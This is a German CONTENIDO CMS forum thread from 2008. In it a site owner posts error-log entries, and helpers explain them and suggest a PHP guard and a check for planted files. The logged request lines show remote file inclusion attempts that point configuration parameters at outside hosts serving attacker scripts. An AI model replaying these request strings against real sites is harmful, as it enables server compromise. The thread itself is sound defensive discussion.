Fehlerlog beinhaltet komische Sachen

Fragen zur Installation von CONTENIDO 4.9? Probleme bei der Konfiguration? Hinweise oder Fragen zur Entwicklung des Systemes oder zur Sicherheit?
Antworten
matt.loker
Beiträge: 203
Registriert: Mo 7. Mai 2007, 09:05
Kontaktdaten:
Kontaktdaten von matt.loker

Fehlerlog beinhaltet komische Sachen

Beitrag von matt.loker »

Eine Frage - muss ich mir hier sorgen machen?
Bin zwar nur Laie aber das sieht mir nach einem gescheiterten Versuch aus - sagt ja :D.

Es läuft Contenido 6.4.23 + MR

PS: Sorry das ich das Board sprenge mit der Log.

Code: Alles auswählen

[28-Jun-2008 09:36:15] //contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.mta.cl/phpform/use/coco.txt?????? MySQL error 1062: Duplicate entry 'a00e2514165aca0b98b9bdc5c07b03a0' for key 1
insert into con_phplib_active_sessions ( sid, name, val, changed ) values ('a00e2514165aca0b98b9bdc5c07b03a0', 'sid_1_1', 'c2lkXzFfMTokdGhpcy0+aW4gPSAnMCc7ICR0aGlzLT5wdCA9IGFycmF5KCk7ICR0aGlzLT5wdFsnYXV0aCddID0gJzEnOyAkdGhpcy0+cHRbJ2NmZ0NsaWVudCddID0gJzEnOyAkdGhpcy0+cHRbJ2VycnNpdGVfaWRjYXQnXSA9ICcxJzsgJHRoaXMtPnB0WydlcnJzaXRlX2lkYXJ0J10gPSAnMSc7ICR0aGlzLT5wdFsnZW5jb2RpbmcnXSA9ICcxJzsgJHRoaXMtPnB0WydsYW5nJ10gPSAnMSc7ICR0aGlzLT5wdFsnY2xpZW50J10gPSAnMSc7ICRHTE9CQUxTWydhdXRoJ10gPSBuZXcgQ29udGVuaWRvX0Zyb250ZW5kX0NoYWxsZW5nZV9DcnlwdF9BdXRoOyAkR0xPQkFMU1snYXV0aCddLT5hdXRoID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2F1dGgnXS0+YXV0aFsndWlkJ10gPSAnbm9ib2R5JzsgJEdMT0JBTFNbJ2F1dGgnXS0+YXV0aFsncGVybSddID0gJyc7ICRHTE9CQUxTWydhdXRoJ10tPmF1dGhbJ2V4cCddID0gJzIxNDc0ODM2NDcnOyAkR0xPQkFMU1snYXV0aCddLT5hdXRoWyd1bmFtZSddID0gJ25vYm9keSc7ICRHTE9CQUxTWydhdXRoJ10tPmF1dGhbJ3JlZnJlc2gnXSA9ICcyMTQ3NDgzNjQ3JzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWydzZXQnXSA9ICdzZXQnOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydwYXRoJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsncGF0aCddWydmcm9udGVuZCddID0gJy9ob21lL3d3dy9zdG9tYV9uYV91bmRfZGUvY29udGVuaWRvL2Ntcy8nOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsncGF0aCddWydodG1scGF0aCddID0gJ2h0dHA6Ly93d3cuc3RvbWEtbmEtdW5kLmRlL2NvbnRlbmlkby9jbXMvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ2ltYWdlcyddID0gJ2h0dHA6Ly93d3cuc3RvbWEtbmEtdW5kLmRlL2NvbnRlbmlkby9jbXMvaW1hZ2VzLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGxvYWQnXSA9ICd1cGxvYWQvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ2h0bWxwYXRoJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsnaHRtbHBhdGgnXVsnZnJvbnRlbmQnXSA9ICdodHRwOi8vd3d3LnN0b21hLW5hLXVuZC5kZS9jb250ZW5pZG8vY21zLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGwnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGwnXVsncGF0aCddID0gJy9ob21lL3d3dy9zdG9tYV9uYV91bmRfZGUvY29udGVuaWRvL2Ntcy91cGxvYWQvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ3VwbCddWydodG1scGF0aCddID0gJ2h0dHA6Ly93d3cuc3RvbWEtbmEtdW5kLmRlL2NvbnRlbmlkby9jbXMvdXBsb2FkLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGwnXVsnZnJvbnRlbmRwYXRoJ10gPSAndXBsb2FkLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydjc3MnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydjc3MnXVsncGF0aCddID0gJy9ob21lL3d3dy9zdG9tYV9uYV91bmRfZGUvY29udGVuaWRvL2Ntcy9jc3MvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ2pzJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsnanMnXVsncGF0aCddID0gJy9ob21lL3d3dy9zdG9tYV9uYV91bmRfZGUvY29udGVuaWRvL2Ntcy9qcy8nOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsndHBsJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsndHBsJ11bJ3BhdGgnXSA9ICcvaG9tZS93d3cvc3RvbWFfbmFfdW5kX2RlL2NvbnRlbmlkby9jbXMvdGVtcGxhdGVzLyc7ICRHTE9CQUxTWydlcnJzaXRlX2lkY2F0J10gPSBhcnJheSgpOyAkR0xPQkFMU1snZXJyc2l0ZV9pZGNhdCddWycxJ10gPSAnMCc7ICRHTE9CQUxTWydlcnJzaXRlX2lkYXJ0J10gPSBhcnJheSgpOyAkR0xPQkFMU1snZXJyc2l0ZV9pZGFydCddWycxJ10gPSAnMCc7ICRHTE9CQUxTWydlbmNvZGluZyddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2VuY29kaW5nJ11bJzEnXSA9ICdpc28tODg1OS0xJzsgJEdMT0JBTFNbJ2VuY29kaW5nJ11bJzInXSA9ICdpc28tODg1OS0xJzsgJEdMT0JBTFNbJ2xhbmcnXSA9ICcxJzsgJEdMT0JBTFNbJ2NsaWVudCddID0gJzEnOyA=', '20080628093615')
[28-Jun-2008 09:36:15] //contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.mta.cl/phpform/use/coco.txt?????? Session: freeze() failed.
[06-Jul-2008 16:16:14] /contenido/cms/errors.php?error=http://www.riksterwebergroep.nl/site/contentimage/cmd7.gif? MySQL error 1062: Duplicate entry '6213ff57304b6de000bd58f04c441ab9' for key 1
insert into con_phplib_active_sessions ( sid, name, val, changed ) values ('6213ff57304b6de000bd58f04c441ab9', 'sid_1_1', 'c2lkXzFfMTokdGhpcy0+aW4gPSAnMCc7ICR0aGlzLT5wdCA9IGFycmF5KCk7ICR0aGlzLT5wdFsnYXV0aCddID0gJzEnOyAkdGhpcy0+cHRbJ2NmZ0NsaWVudCddID0gJzEnOyAkdGhpcy0+cHRbJ2VycnNpdGVfaWRjYXQnXSA9ICcxJzsgJHRoaXMtPnB0WydlcnJzaXRlX2lkYXJ0J10gPSAnMSc7ICR0aGlzLT5wdFsnZW5jb2RpbmcnXSA9ICcxJzsgJHRoaXMtPnB0WydsYW5nJ10gPSAnMSc7ICR0aGlzLT5wdFsnY2xpZW50J10gPSAnMSc7ICRHTE9CQUxTWydhdXRoJ10gPSBuZXcgQ29udGVuaWRvX0Zyb250ZW5kX0NoYWxsZW5nZV9DcnlwdF9BdXRoOyAkR0xPQkFMU1snYXV0aCddLT5hdXRoID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2F1dGgnXS0+YXV0aFsndWlkJ10gPSAnbm9ib2R5JzsgJEdMT0JBTFNbJ2F1dGgnXS0+YXV0aFsncGVybSddID0gJyc7ICRHTE9CQUxTWydhdXRoJ10tPmF1dGhbJ2V4cCddID0gJzIxNDc0ODM2NDcnOyAkR0xPQkFMU1snYXV0aCddLT5hdXRoWyd1bmFtZSddID0gJ25vYm9keSc7ICRHTE9CQUxTWydhdXRoJ10tPmF1dGhbJ3JlZnJlc2gnXSA9ICcyMTQ3NDgzNjQ3JzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWydzZXQnXSA9ICdzZXQnOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydwYXRoJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsncGF0aCddWydmcm9udGVuZCddID0gJy9ob21lL3d3dy9zdG9tYV9uYV91bmRfZGUvY29udGVuaWRvL2Ntcy8nOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsncGF0aCddWydodG1scGF0aCddID0gJ2h0dHA6Ly93d3cuc3RvbWEtbmEtdW5kLmRlL2NvbnRlbmlkby9jbXMvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ2ltYWdlcyddID0gJ2h0dHA6Ly93d3cuc3RvbWEtbmEtdW5kLmRlL2NvbnRlbmlkby9jbXMvaW1hZ2VzLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGxvYWQnXSA9ICd1cGxvYWQvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ2h0bWxwYXRoJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsnaHRtbHBhdGgnXVsnZnJvbnRlbmQnXSA9ICdodHRwOi8vd3d3LnN0b21hLW5hLXVuZC5kZS9jb250ZW5pZG8vY21zLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGwnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGwnXVsncGF0aCddID0gJy9ob21lL3d3dy9zdG9tYV9uYV91bmRfZGUvY29udGVuaWRvL2Ntcy91cGxvYWQvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ3VwbCddWydodG1scGF0aCddID0gJ2h0dHA6Ly93d3cuc3RvbWEtbmEtdW5kLmRlL2NvbnRlbmlkby9jbXMvdXBsb2FkLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGwnXVsnZnJvbnRlbmRwYXRoJ10gPSAndXBsb2FkLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydjc3MnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydjc3MnXVsncGF0aCddID0gJy9ob21lL3d3dy9zdG9tYV9uYV91bmRfZGUvY29udGVuaWRvL2Ntcy9jc3MvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ2pzJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsnanMnXVsncGF0aCddID0gJy9ob21lL3d3dy9zdG9tYV9uYV91bmRfZGUvY29udGVuaWRvL2Ntcy9qcy8nOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsndHBsJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsndHBsJ11bJ3BhdGgnXSA9ICcvaG9tZS93d3cvc3RvbWFfbmFfdW5kX2RlL2NvbnRlbmlkby9jbXMvdGVtcGxhdGVzLyc7ICRHTE9CQUxTWydlcnJzaXRlX2lkY2F0J10gPSBhcnJheSgpOyAkR0xPQkFMU1snZXJyc2l0ZV9pZGNhdCddWycxJ10gPSAnMCc7ICRHTE9CQUxTWydlcnJzaXRlX2lkYXJ0J10gPSBhcnJheSgpOyAkR0xPQkFMU1snZXJyc2l0ZV9pZGFydCddWycxJ10gPSAnMCc7ICRHTE9CQUxTWydlbmNvZGluZyddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2VuY29kaW5nJ11bJzEnXSA9ICdpc28tODg1OS0xJzsgJEdMT0JBTFNbJ2VuY29kaW5nJ11bJzInXSA9ICdpc28tODg1OS0xJzsgJEdMT0JBTFNbJ2xhbmcnXSA9ICcxJzsgJEdMT0JBTFNbJ2NsaWVudCddID0gJzEnOyA=', '20080706161614')
[06-Jul-2008 16:16:14] /contenido/cms/errors.php?error=http://www.riksterwebergroep.nl/site/contentimage/cmd7.gif? Session: freeze() failed.
Nach oben
StSnake
Beiträge: 57
Registriert: Fr 10. Mär 2006, 17:46
Kontaktdaten:
Kontaktdaten von StSnake

Beitrag von StSnake »

Hallo,

solche Einträge tauchen bei mir im LOG in der 4.8.6 auch auf.

Bei mir wurden die Einträge als gescheiterte Versuche definiert, auf alle Fälle aber in der aktuellsten Version.

Viele Grüße
Steffen
Nach oben
frederic.schneider_4fb
Beiträge: 967
Registriert: Do 15. Apr 2004, 17:12
Wohnort: Eschborn-Niederhöchstadt
Kontaktdaten:
Kontaktdaten von frederic.schneider_4fb

Beitrag von frederic.schneider_4fb »

Hallo,

bitte fügt in der Datei "class.inuse.php" folgenden Code an den Anfang ein:

if(isset($_REQUEST['cfg']) || isset($_REQUEST['cfgClient']) || isset($_REQUEST['contenido_path'])) {
die('Invalid call!');
}

Danach kannst du für diese Datei ein Risiko ausschließen, obgleich die "class.inuse.php" eigentlich kein sicherheitsrelevantes Risiko darstellt, wenn sie manuell aufgerufen wird.
Nach oben
matt.loker
Beiträge: 203
Registriert: Mo 7. Mai 2007, 09:05
Kontaktdaten:
Kontaktdaten von matt.loker

Danke

Beitrag von matt.loker »

Vielen Dank :) - wird sofort erledigt!
Nach oben
kloevekorn
Beiträge: 199
Registriert: Mo 31. Okt 2005, 15:26
Wohnort: Hamburg
Kontaktdaten:
Kontaktdaten von kloevekorn

Beitrag von kloevekorn »

/contenido/cms/errors.php?
Gibt es diese Datei auf deinem Webspace?

Im CMS-Verzeichnis gibt es standardmäßig eine -richtige- "error.php".

Eine "errors.php" hat da nichts zu suchen.

Weg damit! Und nach mehr falschen Dateien suchen.
Nach oben
matt.loker
Beiträge: 203
Registriert: Mo 7. Mai 2007, 09:05
Kontaktdaten:
Kontaktdaten von matt.loker

Beitrag von matt.loker »

nein zum die gibt es nicht. Zum Glück :)
Nach oben
Antworten

Zurück zu „Allgemeine Themen“